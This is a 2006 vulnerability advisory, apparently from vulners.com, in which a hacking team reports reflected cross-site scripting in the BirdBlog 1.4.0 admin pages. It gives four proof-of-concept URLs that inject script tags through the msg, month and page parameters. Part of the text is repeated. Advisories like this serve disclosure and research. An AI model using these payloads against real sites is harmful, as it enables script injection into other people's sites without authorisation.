BirdBlog => v1.4.0 Cross Site Scripting

2006-11-2200:00:00

vulners.com

"""""""""""""""""""""""""""""""""""""""""""""""
""" :: :: ::::: :::: """
""" :: :: :: : :: """
""" :::: :: :: ::::: ::::: :::: """
""" :: :: ::: ::: :: :: :: :: :: """
""" :: :: :: : : ::::: :: :: :::: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""
Xmor$ DigitaL Hacking TeaM

BirdBlog => v1.4.0 Cross Site Scripting

Script… : BirdBlog

Discovered by… : the_Edit0r

Location … : Iran

Class… : Xss

Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)

We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r

D3vil_B0y_ir , Tornado , DarkAngel , Behbood

<Spical TNX Irania Hackers :

( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers

Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

proof Of Concept :

Www.Site.coM/[path]/admin/admincore.php?msg="><script>alert('Xmors')</script><
Www.Site.coM/[path]/admin/comments.php?month="><script>alert('Xmors')</script><
Www.Site.coM/[path]/admin/entries.php?month="><script>alert('Xmors')</script><
Www.Site.coM/[path]/admin/logs.php?page="><script>alert('Xmors')</script><

#Contact me : the_3dit0r[at]Yahoo[dot]coM

JSON

BirdBlog =&gt; v1.4.0 Cross Site Scripting

BirdBlog => v1.4.0 Cross Site Scripting

Script… : BirdBlog

Discovered by… : the_Edit0r

Location … : Iran

Class… : Xss

Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)

We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r

D3vil_B0y_ir , Tornado , DarkAngel , Behbood

<Spical TNX Irania Hackers :

( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers

Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

proof Of Concept :

BirdBlog => v1.4.0 Cross Site Scripting